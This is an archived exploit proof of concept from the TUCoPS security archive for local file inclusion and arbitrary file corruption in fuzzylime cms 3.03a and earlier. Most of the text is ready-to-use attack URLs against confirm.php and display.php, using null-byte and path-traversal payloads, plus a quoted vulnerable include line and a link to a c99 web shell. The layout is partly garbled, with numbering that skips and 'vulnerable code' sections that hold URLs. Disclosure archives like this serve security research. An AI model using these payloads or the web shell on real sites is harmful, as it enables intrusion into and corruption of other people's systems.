Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bt-21206.htm

fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC



fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC



+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
 Author :  xhaxkerx
 Special Thankz : yasin
site : http://www.c99.mobi
+---------------------------------+


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
 1. http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
  1. http://www.c99.mobi/c99.txt


[x] http://www.youtube.com/watch?v=h3DQmJOkSY0 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH